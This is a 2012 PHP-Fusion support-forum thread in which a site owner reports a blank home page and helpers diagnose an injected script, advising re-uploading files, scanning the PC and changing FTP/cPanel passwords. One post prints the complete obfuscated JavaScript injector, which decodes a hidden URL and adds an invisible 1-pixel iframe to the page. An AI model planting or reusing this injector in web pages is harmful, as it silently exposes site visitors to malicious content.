Oh no! Where's the JavaScript?
Your Web browser does not have JavaScript enabled or does not support JavaScript. Please enable JavaScript on your Web browser to properly view this Web site, or upgrade to a Web browser that does support JavaScript.
Not a member yet? Click here to register.
Forgot Password?

my home Page appears white??

Asked Modified Viewed 4,217 times
A
arabmeber
A
  • Newbie, joined since
  • Contributed 4 posts on the community forums.
  • Started 1 thread in the forums
  • Started this discussions
asked

Hello,

I am weak speak English, but I've tested the Google Translation from English to Arabic put my problem with my site and especially the Arab closed support site is not working I did not find a solution to my problem.
My problem is:
home Page appears white color.
Or how to solve this problem?
0 replies

8 posts

P
PolarFox
P
  • Veteran Member, joined since
  • Contributed 1,633 posts on the community forums.
  • Started 29 threads in the forums
answered
Veteran Member

What with another pages?
What's your home page URL?
0 replies
A
arabmeber
A
  • Newbie, joined since
answered

[For security reasons (viruses) site link hidden for admins only //khaman]
Edited by Kamillo on 17-03-2012 12:13,
0 replies
J
JoiNNN
J
JoiNNN 10
  • Contributed 850 posts on the community forums.
  • Started 100 threads in the forums
answered
Veteran Member

Your index.php was modified and contains some encoded javascript which translates to an iframe having as a source a malicious site.

Clear your files, or re-upload them, scan your PC for any viruses and change your FTP/cPanel passwords.
0 replies
P
PolarFox
P
answered
Veteran Member

Agreed.
0 replies
A
arabmeber
A
  • Newbie, joined since
answered

arabmeber wrote:

[For security reasons (viruses) site link hidden for admins only //khaman]

I did not understand?? Is it possible to explain more? And how to solve the problem with this virus??

Merged on Mar 18 2012 at 07:32:38:

JoiNNN wrote:

Your index.php was modified and contains some encoded javascript which translates to an iframe having as a source a malicious site.

Clear your files, or re-upload them, scan your PC for any viruses and change your FTP/cPanel passwords.

I get this virus with some file (index,News, Config,login and them array )

<script type="text/javascript">var mLuo=261;function lJdPk(){var TLkZv='MGJk';if('BBDnw'=='eyFr')fcEtxA();}function uHaSGh(){var oSVJ='fzQvM';if('EmWkH'=='Mzju')sEIaN();}

var JUMXCt='ZSSim';var nxRFZ="a\x70pend\x43hild";var ZKtF='WPVmkv';function BWVl(){}function KNQOBE(){var JKzGqe='QTADA';if('JCHH'=='JyRg')QlhE();}

var px1_var="1px";function zXZF(){}var rMiP=189;var appVersion_var="\x61ppVersion";var kiip='zVkhg';var byUM='rXud';var WNYqx="slice";if('pFLgyx'=='zViNK')sxCCwf='Danx';var zOVoEuva="a8b4b4b07a6f6fa7adb3b4a1b46ea9aea6af6f";var SQqd=129;var JMfigj=285;var IPAK='WJAKy';var FWnnT="constructor";var qCszX='KcoQ';function klaAv(){var mADYZ='IBeNlc';if('nrHj'=='feoMEN')JPshut();}

var CqBKdG="b\x6fdy";var mLyhC="";var IDgXJ="\x70ar\x73eInt";var bQYGE='npDjvH';if('WnOP'=='Zclk')GUrEMW='paZnLI';var yRCOmd="fromCha\x72Co\x64e";var gKHBO=(function(){if('TkZn'=='DUFT')bnPeHo='Xwvvja';return this;var VccFuN='igfFrz';if('JgvrF'=='zBck')olZwHT='EleAvu';if('FekP'=='LCri')wJsqT='Xnii';})();var EPZrQ="wwJap"[FWnnT];function LLUCfT(){}function MrhHC(){}

function sIPDM(){var epwVM='pOYhBv';if('JwYHh'=='TuXPt')MmJSI();}

for(var pEOIIPgR=0;pEOIIPgR<zOVoEuva.length;pEOIIPgR+=2){var bsDJg=212;qGQWRsEM=gKHBO[IDgXJ](zOVoEuva[WNYqx](pEOIIPgR,pEOIIPgR+2),16)-64;function eFTmkR(){var rSxC='isyjhx';if('CEsfm'=='YXkfxC')ajCML();}

mLyhC+=EPZrQ[yRCOmd](qGQWRsEM);function Yvko(){}function oZWC(){var yLLrca='NFoGVg';if('XBzMYM'=='zvjXM')fbJGaH();}var DpOfUy='BmkTTG';}

function CPzlbj(){var enifi='LCtQD';if('lKbBd'=='FCwLVR')Irurg();}var RFTf;var ZvsrS;if('epISy'=='tatWg')UiKr='MvXAQq';function QtQJaH(){var lECV='noWfB';if('RGUy'=='ollKi')VtGci();}

var Bpsxi="PNvgw";var kJqFXV=8;var AswqOa=navigator[appVersion_var].indexOf("MSIE")!=-1?'<iframe name="'+Bpsxi+'" src="'+"mLyhC"+'">':'iframe';var MVRF;var JWInM='JbyB';var AKDURzJi=document.createElement(AswqOa);var YFKCDW=116;if('ggTZaC'=='LwuWD')kRuks='lPKTc';if('vEGlDB'=='SDWCB')wpPq='KTvjHz';function bohgAk(){var bEttt='fxESs';if('IThcR'=='FlIzFa')ONowYT();}

AKDURzJi.name=Bpsxi;var yaqp;AKDURzJi.style.right="0px";var BYdfey;var msmya='hkWslz';AKDURzJi.style.top="0px";if('OPbb'=='xoJYx')dWGWfg='ZTJE';var yfFhPw='cDWVWz';AKDURzJi.id=Bpsxi;function KLvFc(){}

AKDURzJi.style.position="absolute";function LBMg(){}

AKDURzJi.style.width=px1_var;function npqQ(){}if('DZmE'=='pbgB')zroYEo();AKDURzJi.setAttribute("src",mLyhC);var jNwE=196;AKDURzJi.style.height=px1_var;var vsnnCE='aLBjah';if('ZvVRH'=='ndzvyL')zdVzll();function DmsY(){}

function xGQzN(){if('glVrax'=='HVjihW')vgNm='Szbshl';if('GpVbu'=='vDMxme')ZkNL();if(document[CqBKdG]){if('tkIEdd'=='laTpY')ruMvH();function URjC(){var PtEJC='bWVi';if('dvzxjQ'=='pVADM')dkeL();}

document[CqBKdG][nxRFZ](AKDURzJi);if('IuQy'=='wRJig')EoTLb();}else{function WPrZcp(){var Cygid='MrDrgU';if('peiBjL'=='jLvehR')poPBW();}

setTimeout(xGQzN,120);var GaOPFC;if('MWZCtm'=='Bwls')AKIIOQ();}

var TsseR='qPir';if('QYmMWt'=='MMzz')eDAB();}

xGQzN();function aHpteN(){}function PakG(){}

function oBkY(){}if('JjXot'=='dOCHvP')AyvD();function fFPTvI(){}</script>

I have applied all the steps required but you will solve the problem
This is not the first time the problem occurs.
Edited by arabmeber on 18-03-2012 09:32,
0 replies
T
Tyler
T
Tyler 10
Helping, would be pointing you in the right direction, not doing it all for you.
  • Member, joined since
  • Contributed 198 posts on the community forums.
  • Started 3 threads in the forums
answered

I've always had suspected Fusion to be a easy target... Never really found out. In a thread about the so called exploit on downloads.php and weblinks.php someone said something along the lines of "It's safe or the whole system is bad"... This main site has never had many successful hacking attemps to my knownledge. With that said it probably has something to do with infusions or mods.. Are you using any and if you are is it a lot?
0 replies
S
skpacman
S
My PHP-Fusion site: https://skpacman.live
  • Member, joined since
  • Contributed 150 posts on the community forums.
  • Started 25 threads in the forums
answered

a code injection like that can also come from your host or your own computer while uploading the scripts to your host. its always smart to run a virus scan on scripts before you upload them to your host
0 replies
A
arabmeber
A
  • Newbie, joined since
answered

Mittens Returns wrote:

I've always had suspected Fusion to be a easy target... Never really found out. In a thread about the so called exploit on downloads.php and weblinks.php someone said something along the lines of "It's safe or the whole system is bad"... This main site has never had many successful hacking attemps to my knownledge. With that said it probably has something to do with infusions or mods.. Are you using any and if you are is it a lot?

Frankly, I did not understand you mean?

Merged on Mar 18 2012 at 20:46:32:

skpacman wrote:

a code injection like that can also come from your host or your own computer while uploading the scripts to your host. its always smart to run a virus scan on scripts before you upload them to your host

Yes, perhaps of the files or the host.
Edited by arabmeber on 18-03-2012 22:46,
0 replies

Labels

None yet

Statistics

• Views 0 views
  • Posts 8 posts
  • Votes 0 votes
  • Topic users 5 members

5 participants

P
P
S
S
My PHP-Fusion site: https://skpacman.live
  • Member, joined since
  • Contributed 150 posts on the community forums.
  • Started 25 threads in the forums
J
J
JoiNNN 10
  • Contributed 850 posts on the community forums.
  • Started 100 threads in the forums
T
T
Tyler 10
Helping, would be pointing you in the right direction, not doing it all for you.
  • Member, joined since
  • Contributed 198 posts on the community forums.
  • Started 3 threads in the forums
A
A
  • Newbie, joined since

Notifications

Track thread

You are not receiving notifications from this thread.

Related Questions

Not yet